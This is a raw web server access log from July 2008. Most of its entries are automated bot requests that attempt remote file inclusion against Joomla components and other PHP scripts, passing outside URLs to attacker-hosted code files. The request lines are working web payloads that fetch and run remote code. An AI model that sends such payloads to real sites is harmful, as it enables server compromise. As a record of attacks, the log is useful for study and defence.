88.255.236.6 - - [13/Jul/2008:12:59:04 -0700] "GET /logs/access_071224.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:04 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:05 -0700] "GET /logs//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:11 -0700] "GET /logs/access_071224.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:12 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:13 -0700] "GET /logs//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:59:20 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:59:21 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:12:59:21 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:40 -0700] "GET /logs/errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:59:41 -0700] "GET /errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:00:02 -0700] "GET /logs/access_071224.log/index.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:00:06 -0700] "GET /index.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18399 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:00:07 -0700] "GET /logs/index.php?content=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:00:58 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:00:58 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:00:58 -0700] "GET /logs/access_080326.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:00:58 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:01:02 -0700] "GET /logs/access_080326.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [13/Jul/2008:13:01:23 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [13/Jul/2008:13:01:24 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.189.226 - - [13/Jul/2008:13:01:43 -0700] "GET /logs/access.log/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.131.171.231 - - [13/Jul/2008:13:01:49 -0700] "GET /logs//start.php?s=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.131.171.231 - - [13/Jul/2008:13:01:50 -0700] "GET //start.php?s=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [13/Jul/2008:13:02:08 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.223 - - [13/Jul/2008:13:02:31 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.223 - - [13/Jul/2008:13:02:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:03:05 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:03:05 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:03:05 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:03:06 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:03:17 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:03:30 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.193 - - [13/Jul/2008:13:03:37 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://lesg.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.193 - - [13/Jul/2008:13:03:37 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://lesg.org/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [13/Jul/2008:13:03:41 -0700] "GET //dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:13:03:54 -0700] "GET /logs/site.php?meio=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:13:03:58 -0700] "GET /logs/access_080329.log//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:13:03:59 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:13:03:59 -0700] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:13:04:00 -0700] "GET /logs/site.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:13:04:05 -0700] "GET /site.php?meio=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:13:04:11 -0700] "GET /site.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:05:56 -0700] "GET /logs/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.231.141 - - [13/Jul/2008:13:05:56 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aphpdeveloper.co.uk/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.231.141 - - [13/Jul/2008:13:05:56 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aphpdeveloper.co.uk/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:06:01 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:06:03 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:06:07 -0700] "GET /logs/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:06:09 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:06:09 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:06:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:07:21 -0700] "GET /logs/access.log/errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:07:22 -0700] "GET /errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:07:22 -0700] "GET /logs/errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:08:27 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:08:27 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:08:28 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:08:28 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:08:29 -0700] "GET /logs/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:08:29 -0700] "GET /logs/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:13:08:41 -0700] "GET /logs/access.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:13:08:42 -0700] "GET /index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:13:08:43 -0700] "GET /logs/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:09:05 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:09:05 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:13:09:28 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:09:38 -0700] "GET /logs/access.log/index1.php?=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:09:39 -0700] "GET /index1.php?=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:09:39 -0700] "GET /logs/index1.php?=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.11.81 - - [13/Jul/2008:13:10:01 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:11:07 -0700] "GET /logs//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:11:09 -0700] "GET //index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:13:11:27 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:13:11:28 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:13:11:29 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:13:12:05 -0700] "GET /logs/access_080303.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:13:12:12 -0700] "GET /logs/access_080214.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:12:30 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:12:31 -0700] "GET /logs/errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:12:31 -0700] "GET /logs/errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:12:31 -0700] "GET /errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:13:12:31 -0700] "GET /errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:12:33 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:12:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:12:33 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:12:41 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:12:43 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:13:39 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:13:39 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:13:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:13:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:13:40 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:13:40 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:13:13:51 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:13:13:52 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:13:13:55 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:13:13:58 -0700] "GET /logs/access.log/HTMLSax3.php?dir[plugins]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:13:13:58 -0700] "GET /HTMLSax3.php?dir[plugins]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:13:13:58 -0700] "GET /logs/HTMLSax3.php?dir[plugins]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:13:14:00 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 18391 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:14:06 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:14:06 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:14:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:14:25 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:14:47 -0700] "GET /logs//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:14:47 -0700] "GET /logs//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:14:48 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:14:48 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:13:14:49 -0700] "GET /logs/access_080225.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:13:14:52 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:13:15:01 -0700] "GET /logs/access_080329.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:13:15:01 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.29.43 - - [13/Jul/2008:13:15:02 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:13:15:11 -0700] "GET /bikes/dteel/2008_02_15/?D=D HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:13:15:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:13:15:17 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:13:15:29 -0700] "GET /logs//display.php?table=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:13:15:32 -0700] "GET //display.php?table=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:16:03 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:16:03 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:16:03 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:16:40 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:16:40 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
